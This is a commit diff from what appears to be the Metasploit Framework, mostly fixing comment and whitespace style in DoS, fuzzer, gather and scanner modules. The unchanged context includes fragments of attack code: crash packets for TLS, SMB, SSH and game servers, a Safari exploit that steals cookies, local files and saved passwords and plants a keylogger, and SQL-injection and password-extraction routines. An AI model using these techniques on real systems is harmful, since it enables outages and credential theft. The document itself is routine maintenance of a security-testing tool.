p2_aes_sha << p2_cssm # Change Cipher Spec Message
p2_aes_sha << p2_ehm # Encrypted Handshake Message
@ -112,7 +112,7 @@ class Metasploit4 < Msf::Auxiliary
p2_dhe << "\x03\x02" # Version: TLS 1.1
p2_dhe << "\x00\x46" # Length: 70
p2_dhe << "\x10" # Handshake Type: Client Key Exchange
p2_dhe << "\x00\x00\x42" # Length: 66
p2_dhe << "\x00\x00\x42" # Length: 66
p2_dhe << "\x00\x40" # DH Pubkey Length: 64
p2_dhe << ("A" * 64) # DH Pubkey
p2_dhe << p2_cssm # Change Cipher Spec Message
@ -124,9 +124,9 @@ class Metasploit4 < Msf::Auxiliary
p2_ecdhe << "\x03\x02" # Version: TLS 1.1
p2_ecdhe << "\x00\x46" # Length: 70
p2_ecdhe << "\x10" # Handshake Type: Client Key Exchange
p2_ecdhe << "\x00\x00\x42" # Length: 66
p2_ecdhe << "\x00\x00\x42" # Length: 66
p2_ecdhe << "\x41" # EC DH Pubkey Length: 65
# EC DH Pubkey:
# EC DH Pubkey:
p2_ecdhe << "\x04\x2f\x22\xf4\x06\x3f\xa1\xf7\x3d\xb6\x55\xbc\x68\x65\x57\xd8"
p2_ecdhe << "\x03\xe5\xaa\x36\xeb\x0f\x52\x5a\xaf\xd0\x9f\xf8\xc7\xfe\x09\x69"
p2_ecdhe << "\x5b\x38\x95\x58\xb6\x0d\x27\x53\xe9\x63\xcb\x96\xb3\x54\x47\xa6"

2
modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb
View File

@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run
#Attempt to crash IIS FTP
# Attempt to crash IIS FTP
begin
return unless connect_login
print_status('Checking if there is at least one directory ...')

6
modules/auxiliary/dos/windows/ftp/solarftp_user.rb
View File

@ -21,9 +21,9 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' =>
[
'x000 <3d3n[at]hotmail.com.br>', #Initial disclosure/exploit
'C4SS!0 G0M3S <Louredo_[at]hotmail.com>', #Metasploit submission
'sinn3r', #Metasploit edit/commit
'x000 <3d3n[at]hotmail.com.br>', # Initial disclosure/exploit
'C4SS!0 G0M3S <Louredo_[at]hotmail.com>', # Metasploit submission
'sinn3r', # Metasploit edit/commit
],
'License' => MSF_LICENSE,
'References' =>

6
modules/auxiliary/dos/windows/games/kaillera.rb
View File

@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run
#Send HELLO to target
# Send HELLO to target
connect_udp
print_status("Sending Crash request...")
udp_sock.put("HELLO0.83\0")
@ -44,13 +44,13 @@ class Metasploit3 < Msf::Auxiliary
return
end
#Send DOS packet
# Send DOS packet
connect_udp(global = true,'RPORT' => port)
print_status("Sending DoS packet to #{rhost}:#{port}...")
udp_sock.put("Kthxbai")
disconnect_udp
#Check is target is down
# Check is target is down
connect_udp
print_status("Checking target...")
udp_sock.put("HELLO0.83\0")

1
modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb
View File

@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' =>
[
'Alligator Security Team',
'Heyder Andrade <heyder[at]alligatorteam.org>',
'Leandro Oliveira <leadro[at]alligatorteam.org>'
],

2
modules/auxiliary/dos/windows/smb/ms09_001_write.rb
View File

@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary
pkt['Payload'].v['DataLenLow'] = dlenlow #<==================
pkt['Payload'].v['DataOffset'] = doffset #<====
pkt['Payload'].v['DataOffsetHigh'] = 0xcccccccc #<====
pkt['Payload'].v['ByteCount'] = fillersize#<====
pkt['Payload'].v['ByteCount'] = fillersize #<====
pkt['Payload'].v['Payload'] = filler
simple.client.smb_send(pkt.to_s)

6
modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb
View File

@ -40,9 +40,9 @@ class Metasploit3 < Msf::Auxiliary
delimiter = "\x00"*3
packet = [0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f,
0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
0x00, 0x7e].pack("C*")
0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
0x00, 0x7e].pack("C*")
packet << Rex::Text.rand_text_alphanumeric(126)
packet << delimiter
packet << Rex::Text.rand_text_alphanumeric(16)

37
modules/auxiliary/fuzzers/ftp/client_ftp.rb
View File

@ -48,25 +48,17 @@ class Metasploit3 < Msf::Auxiliary
false
end
#---------------------------------------------------------------------------------
def setup
super
@state = {}
end
#---------------------------------------------------------------------------------
def run
@fuzzsize=datastore['STARTSIZE'].to_i
exploit()
end
#---------------------------------------------------------------------------------
# Handler for new FTP client connections
#---------------------------------------------------------------------------------
def on_client_connect(c)
@state[c] = {
:name => "#{c.peerhost}:#{c.peerport}",
@ -75,20 +67,18 @@ class Metasploit3 < Msf::Auxiliary
:user => nil,
:pass => nil
}
#set up an active data port on port 20
# set up an active data port on port 20
print_status("Client connected : " + c.peerhost)
active_data_port_for_client(c, 20)
send_response(c,"","WELCOME",220," "+datastore['WELCOME'])
#from this point forward, on_client_data() will take over
# from this point forward, on_client_data() will take over
end
def on_client_close(c)
@state.delete(c)
end
#---------------------------------------------------------------------------------
# Active and Passive data connections
#---------------------------------------------------------------------------------
def passive_data_port_for_client(c)
@state[c][:mode] = :passive
if(not @state[c][:passive_sock])
@ -140,22 +130,17 @@ class Metasploit3 < Msf::Auxiliary
nil
end
#---------------------------------------------------------------------------------
# FTP Client-to-Server Command handlers
#---------------------------------------------------------------------------------
# FTP Client-to-Server Command handlers
def on_client_data(c)
#get the client data
# get the client data
data = c.get_once
return if not data
#split data into command and arguments
# split data into command and arguments
cmd,arg = data.strip.split(/\s+/, 2)
arg ||= ""
return if not cmd
#convert commands to uppercase and strip spaces
# convert commands to uppercase and strip spaces
case cmd.upcase.strip
when 'USER'
@ -247,7 +232,7 @@ class Metasploit3 < Msf::Auxiliary
return
when /^(LIST|NLST|LS)$/
#special case - requires active/passive connection
# special case - requires active/passive connection
print_status("Handling #{cmd.upcase} command")
conn = establish_data_connection(c)
if(not conn)
@ -289,7 +274,7 @@ class Metasploit3 < Msf::Auxiliary
return
when 'RETR'
#special case - requires active/passive connection
# special case - requires active/passive connection
print_status("Handling #{cmd.upcase} command")
conn = establish_data_connection(c)
if(not conn)
@ -353,11 +338,7 @@ class Metasploit3 < Msf::Auxiliary
return
end
#---------------------------------------------------------------------------------
# Fuzzer functions
#---------------------------------------------------------------------------------
# Do we need to fuzz this command ?
def fuzz_this_cmd(cmd)
@ -421,7 +402,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("* Fuzz data sent")
incr_fuzzsize()
else
#Do not fuzz
# Do not fuzz
cmsg = code.to_s + msg
cmsg = cmsg.strip
c.put("#{cmsg}\r\n")

26
modules/auxiliary/fuzzers/http/http_form_field.rb
View File

@ -175,14 +175,14 @@ class Metasploit3 < Msf::Auxiliary
else
datastr = "\r\n"
end
#first, check the original header fields and add some others - just for fun
# first, check the original header fields and add some others - just for fun
myheaders = @send_data[:headers]
mysendheaders = @send_data[:headers].dup
#get or post ?
# get or post ?
mysendheaders[:method] = form[:method].upcase
myheaders.each do | thisheader |
if not headers[thisheader[0]]
#add header if needed
# add header if needed
mysendheaders[thisheader[0]]= thisheader[1]
end
end
@ -300,7 +300,7 @@ class Metasploit3 < Msf::Auxiliary
def get_field_val(input)
tmp = input.split(/\=/)
#get delimeter
# get delimeter
tmp2 = tmp[1].strip
delim = tmp2[0,1]
if delim != "'" && delim != '"'
@ -316,7 +316,7 @@ class Metasploit3 < Msf::Auxiliary
body = body.gsub("\r","")
body = body.gsub("\n","")
bodydata = body.downcase.split(/<form/)
#we need part after <form
# we need part after <form
totalforms = bodydata.size - 1
print_status(" Number of forms : #{totalforms}")
formcnt = 0
@ -326,7 +326,7 @@ class Metasploit3 < Msf::Auxiliary
fdata = bodydata[formidx]
print_status(" - Enumerating form ##{formcnt+1}")
data = fdata.downcase.split(/<\/form>/)
#first, get action and name
# first, get action and name
formdata = data[0].downcase.split(/>/)
subdata = formdata[0].downcase.split(/ /)
namefound = false
@ -375,7 +375,7 @@ class Metasploit3 < Msf::Auxiliary
namefound = true
formfields = []
#input boxes
# input boxes
fieldtypemarks = [ '<input', '<select' ]
fieldtypemarks.each do | currfieldmark |
formfieldcnt=0
@ -386,7 +386,7 @@ class Metasploit3 < Msf::Auxiliary
if subdata.size > 1
subdata.each do | thisinput |
if skipflag == 1
#first, find the delimeter
# first, find the delimeter
fielddata = thisinput.downcase.split(/>/)
fields = fielddata[0].split(/ /)
fieldname = ""
@ -408,7 +408,7 @@ class Metasploit3 < Msf::Auxiliary
fieldid = get_field_val(thisfield)
end
if thisfield.match(/^value=/)
#special case
# special case
location = fielddata[0].index(thisfield)
delta = fielddata[0].size - location
remaining = fielddata[0][location,delta]
@ -518,13 +518,13 @@ class Metasploit3 < Msf::Auxiliary
formfound = response.body.downcase.index("<form")
if formfound
formdata = get_form_data(response.body)
#fuzz !
#for each form that needs to be fuzzed
# fuzz !
# for each form that needs to be fuzzed
formdata.each do | thisform |
if thisform[:name].length > 0
if ((datastore['FORM'].strip == "") || (datastore['FORM'].upcase.strip == thisform[:name].upcase.strip)) && (thisform[:fields].size > 0)
print_status("Fuzzing fields in form #{thisform[:name].upcase.strip}")
#for each field in this form, fuzz one field at a time
# for each field in this form, fuzz one field at a time
formfields = thisform[:fields]
formfields.each do | thisfield |
if thisfield[:name]
@ -537,7 +537,7 @@ class Metasploit3 < Msf::Auxiliary
end
print_status("Done fuzzing fields in form #{thisform[:name].upcase.strip}")
end
#fuzz headers ?
# fuzz headers ?
if datastore['FUZZHEADERS'] == true
print_status("Fuzzing header fields")
do_fuzz_headers(thisform,response.headers)

2
modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb
View File

@ -137,7 +137,7 @@ class Metasploit3 < Msf::Auxiliary
rescue ::Exception => e
last_err = e
#ensure
# disconnect
#disconnect
end

48
modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
View File

@ -282,7 +282,7 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] the XML markup to insert into the webarchive for each unique
# iframe (we use one frame per site we want to steal)
# iframe (we use one frame per site we want to steal)
# @return '' if msf user does not want to poison cache
def webarchive_resources_for_poisoning_cache(url)
if not should_install_keyloggers? then return '' end
@ -320,14 +320,14 @@ class Metasploit3 < Msf::Auxiliary
|
end
# @param [script] hash containing HTTP headers from the request
# @param script [Hash] containing HTTP headers from the request
# @return [String] xml markup for serialized WebResourceResponse containing good
# stuff like HTTP/caching headers. Safari appears to do the following:
# NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data];
# [a encodeObject:response forKey:@"WebResourceResponse"];
# stuff like HTTP/caching headers. Safari appears to do the following:
# NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data];
# [a encodeObject:response forKey:@"WebResourceResponse"];
def web_response_xml(script)
# this is a serialized NSHTTPResponse, i'm too lazy to write a
# real encoder so yay lets use string interpolation.
# real encoder so yay lets use string interpolation.
# ripped this straight out of a webarchive save
script['content-length'] = script[:body].length
whitelist = %w(content-type content-length date etag
@ -507,7 +507,7 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] mark up for embedding the iframes for each URL in a place that is
# invisible to the user
# invisible to the user
def iframes_container_html
hidden_style = "position:fixed; left:-600px; top:-600px;"
wrap_with_doc do
@ -517,8 +517,8 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] javascript code, wrapped in script tags, that is inserted into the
# WebMainResource (parent) frame so that child frames can communicate "up" to the parent
# and send data out to the listener
# WebMainResource (parent) frame so that child frames can communicate "up" to the parent
# and send data out to the listener
def communication_js
wrap_with_script do
%Q|
@ -543,7 +543,7 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] javascript code, wrapped in a script tag, that steals the cookies
# and response body/headers, and passes them back up to the parent.
# and response body/headers, and passes them back up to the parent.
def steal_cookies_for_url(url)
wrap_with_script do
%Q|
@ -568,8 +568,8 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] javascript code, wrapped in a script tag, that steals local files
# and sends them back to the listener. This code is executed in the WebMainResource (parent)
# frame, which runs in the file:// protocol
# and sends them back to the listener. This code is executed in the WebMainResource (parent)
# frame, which runs in the file:// protocol
def steal_files
return '' unless should_steal_files?
urls_str = [datastore['FILE_URLS'], interesting_file_urls.join(' ')].join(' ')
@ -595,9 +595,9 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] javascript code, wrapped in a script tag, that steals autosaved form
# usernames and passwords. The attack first tries to render the target URL in an iframe,
# and steal populated passwords from there. If the site disables iframes through the
# X-Frame-Options header, we try popping open a new window and rendering the site in that.
# usernames and passwords. The attack first tries to render the target URL in an iframe,
# and steal populated passwords from there. If the site disables iframes through the
# X-Frame-Options header, we try popping open a new window and rendering the site in that.
def steal_form_data_for_url(url)
wrap_with_script do
%Q|
@ -663,8 +663,8 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] javascript code, wrapped in script tag, that adds a helper function
# called "sendData()" that passes the arguments up to the parent frame, where it is
# sent out to the listener
# called "sendData()" that passes the arguments up to the parent frame, where it is
# sent out to the listener
def injected_js_helpers
wrap_with_script do
%Q|
@ -678,7 +678,7 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [String] HTML markup that includes a script at the URL we want to poison
# We will then install the injected_js_keylogger at the same URL
# We will then install the injected_js_keylogger at the same URL
def trigger_cache_poison_for_url(url)
url_idx = urls.index(url)
scripts_to_poison[url_idx].map { |s|
@ -686,10 +686,10 @@ class Metasploit3 < Msf::Auxiliary
}.join
end
# @param [String] original_js the original contents of the script file
# @param original_js [String] the original contents of the script file
# @return [String] the poisoned contents. Once the module has found a valid 304'd script to
# poison, it "poisons" it by adding a keylogger, then adds the output as a resource with
# appropriate Cache-Control to the webarchive.
# poison, it "poisons" it by adding a keylogger, then adds the output as a resource with
# appropriate Cache-Control to the webarchive.
# @return [String] the original contents if msf user does not want to install keyloggers
def inject_js_keylogger(original_js)
if not should_install_keyloggers?
@ -726,7 +726,7 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [Array<Array<String>>] list of URLs provided by the user mapped to all of the linked
# javascript assets in its HTML response.
# javascript assets in its HTML response.
def all_script_urls(pages)
pages.map do |url|
results = []
@ -829,7 +829,7 @@ class Metasploit3 < Msf::Auxiliary
end
# @return [Array<String>] of interesting file URLs to steal. Additional files can be stolen
# via the FILE_URLS module option.
# via the FILE_URLS module option.
def interesting_file_urls
[
'file:///var/log/weekly.out', # may contain usernames
@ -849,7 +849,7 @@ class Metasploit3 < Msf::Auxiliary
(datastore['URLS'] || '').split(/\s+/)
end
# @param [String] input the unencoded string
# @param input [String] the unencoded string
# @return [String] input with dangerous chars replaced with xml entities
def escape_xml(input)
input.to_s.gsub("&", "&amp;").gsub("<", "&lt;")

4
modules/auxiliary/gather/coldfusion_pwd_props.rb
View File

@ -158,14 +158,14 @@ class Metasploit3 < Msf::Auxiliary
filename = ""
url = '/CFIDE/administrator/index.cfm'
# print_status("Getting index...")
# print_status("Getting index...")
res = send_request_cgi({
'uri' => url,
'method' => 'GET',
'Connection' => "keep-alive",
'Accept-Encoding' => "zip,deflate",
})
# print_status("Got back: #{res.inspect}")
# print_status("Got back: #{res.inspect}")
return if not res
return if not res.body or not res.code
return if not res.code.to_i == 200

2
modules/auxiliary/gather/dns_srv_enum.rb
View File

@ -105,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary
def srvqry(dom)
results = []
#Most common SRV Records
# Most common SRV Records
srvrcd = [
'_gc._tcp.', '_kerberos._tcp.', '_kerberos._udp.', '_ldap._tcp.',
'_test._tcp.', '_sips._tcp.', '_sip._udp.', '_sip._tcp.', '_aix._tcp.',

29
modules/auxiliary/gather/enum_dns.rb
View File

@ -51,7 +51,6 @@ class Metasploit3 < Msf::Auxiliary
], self.class)
end
#---------------------------------------------------------------------------------
def switchdns(target)
if not datastore['NS'].nil?
print_status("Using DNS Server: #{datastore['NS']}")
@ -71,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
#---------------------------------------------------------------------------------
def wildcard(target)
rendsub = rand(10000).to_s
query = @res.query("#{rendsub}.#{target}", "A")
@ -85,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary
return false
end
end
#---------------------------------------------------------------------------------
def genrcd(target)
print_status("Retrieving general DNS records")
query = @res.search(target)
@ -167,7 +166,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
#---------------------------------------------------------------------------------
def tldexpnd(targetdom,nssrv)
target = targetdom.scan(/(\S*)[.]\w*\z/).join
target.chomp!
@ -178,13 +177,13 @@ class Metasploit3 < Msf::Auxiliary
i, a = 0, []
tlds = [
"com", "org", "net", "edu", "mil", "gov", "uk", "af", "al", "dz",
"as", "ad", "ao", "ai", "aq", "ag", "ar", "am", "aw", "ac","au",
"as", "ad", "ao", "ai", "aq", "ag", "ar", "am", "aw", "ac", "au",
"at", "az", "bs", "bh", "bd", "bb", "by", "be", "bz", "bj", "bm",
"bt", "bo", "ba", "bw", "bv", "br", "io", "bn", "bg", "bf", "bi",
"kh", "cm", "ca", "cv", "ky", "cf", "td", "cl", "cn", "cx", "cc",
"co", "km", "cd", "cg", "ck", "cr", "ci", "hr", "cu", "cy", "cz",
"co", "km", "cd", "cg", "ck", "cr", "ci", "hr", "cu", "cy", "cz",
"dk", "dj", "dm", "do", "tp", "ec", "eg", "sv", "gq", "er", "ee",
"et", "fk", "fo", "fj", "fi", "fr", "gf", "pf", "tf", "ga", "gm",
"et", "fk", "fo", "fj", "fi", "fr", "gf", "pf", "tf", "ga", "gm",
"ge", "de", "gh", "gi", "gr", "gl", "gd", "gp", "gu", "gt", "gg",
"gn", "gw", "gy", "ht", "hm", "va", "hn", "hk", "hu", "is", "in",
"id", "ir", "iq", "ie", "im", "il", "it", "jm", "jp", "je", "jo",
@ -221,7 +220,6 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------------------------------
def dnsbrute(target, wordlist, nssrv)
print_status("Running bruteforce against domain #{target}")
arr = []
@ -250,7 +248,6 @@ class Metasploit3 < Msf::Auxiliary
end
end
#-------------------------------------------------------------------------------
def bruteipv6(target, wordlist, nssrv)
print_status("Bruteforcing IPv6 addresses against domain #{target}")
arr = []
@ -283,7 +280,6 @@ class Metasploit3 < Msf::Auxiliary
#-------------------------------------------------------------------------------
def reverselkp(iprange,nssrv)
print_status("Running reverse lookup against IP range #{iprange}")
if not nssrv.nil?
@ -327,12 +323,12 @@ class Metasploit3 < Msf::Auxiliary
tl.delete_if { |t| not t.alive? }
end
end
#-------------------------------------------------------------------------------
#SRV Record Enumeration
# SRV Record Enumeration
def srvqry(dom,nssrv)
print_status("Enumerating SRV records for #{dom}")
i, a = 0, []
#Most common SRV Records
# Most common SRV Records
srvrcd = [
"_gc._tcp.","_kerberos._tcp.", "_kerberos._udp.","_ldap._tcp","_test._tcp.",
"_sips._tcp.","_sip._udp.","_sip._tcp.","_aix._tcp.","_aix._tcp.","_finger._tcp.",
@ -354,8 +350,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
#-------------------------------------------------------------------------------
#For Performing Zone Transfers
# For Performing Zone Transfers
def axfr(target, nssrv)
print_status("Performing zone transfer against all nameservers in #{target}")
if not nssrv.nil?
@ -387,7 +382,7 @@ class Metasploit3 < Msf::Auxiliary
:type => 'dns.enum',
:update => :unique_data,
:data => "Zone transfer successful")
#Prints each record according to its type
# Prints each record according to its type
zone.each do |response|
response.answer.each do |rr|
begin
@ -475,7 +470,7 @@ class Metasploit3 < Msf::Auxiliary
:data => "#{rr.host},#{rr.port},#{rr.priority},SRV")
end
rescue ActiveRecord::RecordInvalid
#Do nothing. Probably tried to store :host => 127.0.0.1
# Do nothing. Probably tried to store :host => 127.0.0.1
end
end
end

2
modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb
View File

@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
'License' => MSF_LICENSE,
'Author' => [
'Michele Spagnuolo', # discovery, wrote rosetta encoder, disclosure
'joev' # msf module
'joev' # metasploit module
],
'References' =>
[

8
modules/auxiliary/gather/mantisbt_admin_sqli.rb
View File

@ -84,10 +84,10 @@ class Metasploit4 < Msf::Auxiliary
fail_with("Error in server response")
end
#qgjuq is prepended to the result of the sql injection
#qirpq is appended to the result of the sql injection
#This allows the use of a simple regex to grab the contents
#of the file easily from the page source.
# qgjuq is prepended to the result of the sql injection
# qirpq is appended to the result of the sql injection
# This allows the use of a simple regex to grab the contents
# of the file easily from the page source.
file = /qgjuq(.*)qirpq/.match(resp.body)
file = file[0].gsub('qgjuq', '').gsub('qirpq', '')

4
modules/auxiliary/gather/ms14_052_xmldom.rb
View File

@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => "MS14-052 Microsoft Internet Explorer XMLDOM Filename Disclosure",
'Description' => %q{
This module will use the Microsoft XMLDOM object to enumerate a remote user's filenames.
This module will use the Microsoft XMLDOM object to enumerate a remote machine's filenames.
It will try to do so against Internet Explorer 8 and Internet Explorer 9. To use it, you
must supply your own list of file paths. Each file's format should look like this:
must supply your own list of file paths. Each file path should look like this:
c:\\\\windows\\\\system32\\\\calc.exe
},
'License' => MSF_LICENSE,

8
modules/auxiliary/gather/mybb_db_fingerprint.rb
View File

@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
return Exploit::CheckCode::Unknown
end
#Check PhP
# Check PhP
php_version = res['X-Powered-By']
if php_version
php_version = "#{php_version}"
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
php_version = "PHP version unknown"
end
#Check Web-Server
# Check Web-Server
web_server = res['Server']
if web_server
web_server = "#{web_server}"
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
web_server = "unknown web server"
end
#Check forum MyBB
# Check forum MyBB
if res.body.match("&#077;&#089;&#066;&#066;")
print_good("#{peer} - MyBB forum found running on #{web_server} / #{php_version}")
return Exploit::CheckCode::Detected
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary
return
end
#Resolve response
# Resolve response
if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/)
print_good("#{peer} - Running PostgreSQL Database")
elsif response.body.match(/General error\: 1 no such function\: REGEXP/)

8
modules/auxiliary/gather/search_email_collector.rb
View File

@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
end
#Search google.com for email's of target domain
# Search google.com for email's of target domain
def search_google(targetdom)
print_status("Searching Google for email addresses from #{targetdom}")
response = ""
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
return emails.uniq
end
#Search Yahoo.com for email's of target domain
# Search Yahoo.com for email's of target domain
def search_yahoo(targetdom)
print_status("Searching Yahoo for email addresses from #{targetdom}")
response = ""
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
return emails.uniq
end
#Search Bing.com for email's of target domain
# Search Bing.com for email's of target domain
def search_bing(targetdom)
print_status("Searching Bing email addresses from #{targetdom}")
response = ""
@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary
return emails.uniq
end
#for writing file with all email's found
# for writing file with all email's found
def write_output(data)
print_status("Writing email address list to #{datastore['OUTFILE']}...")
::File.open(datastore['OUTFILE'], "ab") do |fd|

2
modules/auxiliary/gather/xerox_pwd_extract.rb
View File

@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
#Trigger firmware bootstrap write out password data to URL root
# Trigger firmware bootstrap write out password data to URL root
def write
print_status("#{rhost}:#{jport} - Sending print job")
create_print_job = '%%XRXbegin' + "\x0a"

4
modules/auxiliary/scanner/afp/afp_login.rb
View File

@ -23,8 +23,8 @@ class Metasploit3 < Msf::Auxiliary
},
'References' =>
[
[ 'URL', 'https://developer.apple.com/library/mac/#documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ],
[ 'URL', 'https://developer.apple.com/library/mac/#documentation/networking/conceptual/afp/AFPSecurity/AFPSecurity.html' ]
[ 'URL', 'https://developer.apple.com/library/mac/documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ],
[ 'URL', 'https://developer.apple.com/library/mac/documentation/networking/conceptual/afp/AFPSecurity/AFPSecurity.html' ]
],
'Author' => [ 'Gregory Man <man.gregory[at]gmail.com>' ],

2
modules/auxiliary/scanner/afp/afp_server_info.rb
View File

@ -21,7 +21,7 @@ class Metasploit3 < Msf::Auxiliary
},
'References' =>
[
[ 'URL', 'https://developer.apple.com/library/mac/#documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ]
[ 'URL', 'https://developer.apple.com/library/mac/documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ]
],
'Author' => [ 'Gregory Man <man.gregory[at]gmail.com>' ],
'License' => MSF_LICENSE

2
modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb
View File

@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary
sock.put(trojan_command(:nop))
print_status("#{ip}:#{rport} FOUND: #{files.inspect}")
## Add Vulnerability and Report
# Add Vulnerability and Report
report_vuln({
:host => ip,
:name => "Energizer DUO USB Battery Charger Software Arucer.dll Trojaned Distribution",

2
modules/auxiliary/scanner/db2/discovery.rb
View File

@ -31,9 +31,7 @@ class Metasploit3 < Msf::Auxiliary
begin
connect_udp
udp_sock.put(pkt)
res = udp_sock.read(1024).split(/\x00/)
if (res)

Some files were not shown because too many files have changed in this diff Show More